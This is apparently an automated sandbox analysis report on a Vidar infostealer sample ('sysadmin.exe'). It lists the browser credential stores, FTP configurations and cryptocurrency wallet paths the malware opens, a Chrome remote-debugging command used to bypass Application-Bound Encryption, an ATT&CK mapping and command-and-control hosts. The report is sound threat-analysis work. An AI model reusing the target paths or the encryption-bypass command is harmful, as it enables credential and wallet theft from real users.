            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7412, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Attempt to bypass Chrome Application-Bound Encryption
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Yara detected Vidar stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            Create Account            		311
            Process Injection            		1
            Masquerading            		2
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            Credentials in Registry            		1
            Security Software Discovery            		Remote Desktop Protocol4
            Data from Local System            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Extra Window Memory Injection            		31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Remote Access Software            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
            Process Injection            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture2
            Ingress Tool Transfer            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information            		LSA Secrets1
            Account Discovery            		SSHKeylogging3
            Non-Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials1
            System Owner/User Discovery            		VNCGUI Input Capture14
            Application Layer Protocol            		Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Extra Window Memory Injection            		DCSync4
            File and Directory Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem34
            System Information Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590244 Sample: sysadmin.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 41 maximu.sbs 2->41 43 t.me 2->43 63 Suricata IDS alerts for network traffic 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 6 other signatures 2->69 9 sysadmin.exe 10 2->9         started        signatures3 process4 dnsIp5 49 85.192.63.194, 49730, 7777 LINEGROUP-ASRU Russian Federation 9->49 39 C:\Users\user\AppData\...\jhtixtpk.cmdline, Unicode 9->39 dropped 71 Writes to foreign memory regions 9->71 73 Allocates memory in foreign processes 9->73 75 Injects a PE file into a foreign processes 9->75 14 RegAsm.exe 52 9->14         started        18 csc.exe 3 9->18         started        file6 signatures7 process8 dnsIp9 51 maximu.sbs 116.203.166.124, 443, 49732, 49733 HETZNER-ASDE Germany 14->51 53 t.me 149.154.167.99, 443, 49731 TELEGRAMRU United Kingdom 14->53 55 127.0.0.1 unknown unknown 14->55 77 Attempt to bypass Chrome Application-Bound Encryption 14->77 79 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->79 81 Found many strings related to Crypto-Wallets (likely being stolen) 14->81 83 4 other signatures 14->83 21 chrome.exe 14->21         started        24 cmd.exe 1 14->24         started        37 C:\Users\user\AppData\Local\...\jhtixtpk.dll, PE32 18->37 dropped 26 conhost.exe 18->26         started        28 cvtres.exe 1 18->28         started        file10 signatures11 process12 dnsIp13 45 192.168.2.4, 138, 443, 49666 unknown unknown 21->45 47 239.255.255.250 unknown Reserved 21->47 30 chrome.exe 21->30         started        33 conhost.exe 24->33         started        35 timeout.exe 1 24->35         started        process14 dnsIp15 57 plus.l.google.com 172.217.18.14, 443, 49761 GOOGLEUS United States 30->57 59 www.google.com 216.58.206.68, 443, 49745, 49747 GOOGLEUS United States 30->59 61 2 other IPs or domains 30->61

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            sysadmin.exe5%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            plus.l.google.com
            		172.217.18.14
            		truefalse
              		high
              play.google.com
              		216.58.206.46
              		truefalse
                		high
                maximu.sbs
                		116.203.166.124
                		truetrue
                  		unknown
                  t.me
                  		149.154.167.99
                  		truefalse
                    		high
                    www.google.com
                    		216.58.206.68
                    		truefalse
                      		high
                      apis.google.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://steamcommunity.com/profiles/76561199816275252false
                          		high
                          https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabRegAsm.exe, 00000004.00000002.2324726568.0000000003B67000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=RegAsm.exe, 00000004.00000002.2324726568.0000000003B67000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://google-ohttp-relay-join.fastly-edge.com/(lchrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://anglebug.com/4633chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://anglebug.com/7382chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.RegAsm.exe, 00000004.00000002.2328014829.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2326300470.0000000003C20000.00000004.00000020.00020000.00000000.sdmp, 16fct0.4.drfalse
                                        		high
                                        https://issuetracker.google.com/284462263chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://google-ohttp-relay-join.fastly-edge.com/9lchrome.exe, 00000005.00000003.1878955833.00006A400152C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1878929698.00006A4001528000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://polymer.github.io/AUTHORS.txtchrome.exe, 00000005.00000003.1856921212.00006A4000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859814307.00006A4001150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856815221.00006A4001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858821366.00006A4000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858508013.00006A4000EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858570195.00006A40007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856659366.00006A4000EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859506476.00006A40010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1857052776.00006A400100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856779226.00006A4000FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859371665.00006A4000E0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://docs.google.com/chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://anglebug.com/7714chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000005.00000003.1859814307.00006A4001150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859506476.00006A40010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://anglebug.com/6248chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000005.00000003.1869844586.00006A400128C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://anglebug.com/6929chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://anglebug.com/5281chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesysadmin.exe, 00000000.00000002.1727704147.000001A6BFDE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94RegAsm.exe, 00000004.00000002.2328014829.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2326300470.0000000003C20000.00000004.00000020.00020000.00000000.sdmp, 16fct0.4.drfalse
                                                                    		high
                                                                    https://issuetracker.google.com/255411748chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://anglebug.com/7246chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://anglebug.com/7369chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://anglebug.com/7489chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://chrome.google.com/webstorechrome.exe, 00000005.00000003.1859669568.00006A4000CB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://drive-daily-2.corp.google.com/chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://polymer.github.io/PATENTS.txtchrome.exe, 00000005.00000003.1856921212.00006A4000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859814307.00006A4001150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856815221.00006A4001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858821366.00006A4000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858508013.00006A4000EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858570195.00006A40007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856659366.00006A4000EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859506476.00006A40010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1857052776.00006A400100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856779226.00006A4000FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859371665.00006A4000E0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegAsm.exe, 00000004.00000002.2324726568.0000000003B67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaRegAsm.exe, 00000004.00000002.2328014829.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2326300470.0000000003C20000.00000004.00000020.00020000.00000000.sdmp, 16fct0.4.drfalse
                                                                                      		high
                                                                                      https://issuetracker.google.com/161903006chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.ecosia.org/newtab/RegAsm.exe, 00000004.00000002.2324726568.0000000003B67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://drive-daily-1.corp.google.com/chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://drive-daily-5.corp.google.com/chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://plus.google.comchromecache_83.8.drfalse
                                                                                                		high
                                                                                                http://anglebug.com/3078chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://anglebug.com/7553chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://anglebug.com/5375chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://anglebug.com/5371chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://anglebug.com/4722chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://anglebug.com/7556chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://drive-preprod.corp.google.com/chrome.exe, 00000005.00000003.1836832928.00006A4000490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesimoh4w.4.drfalse
                                                                                                                		high
                                                                                                                https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000005.00000003.1876257197.00006A400140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://anglebug.com/6692chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://issuetracker.google.com/258207403chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://anglebug.com/3502chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://anglebug.com/3623chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
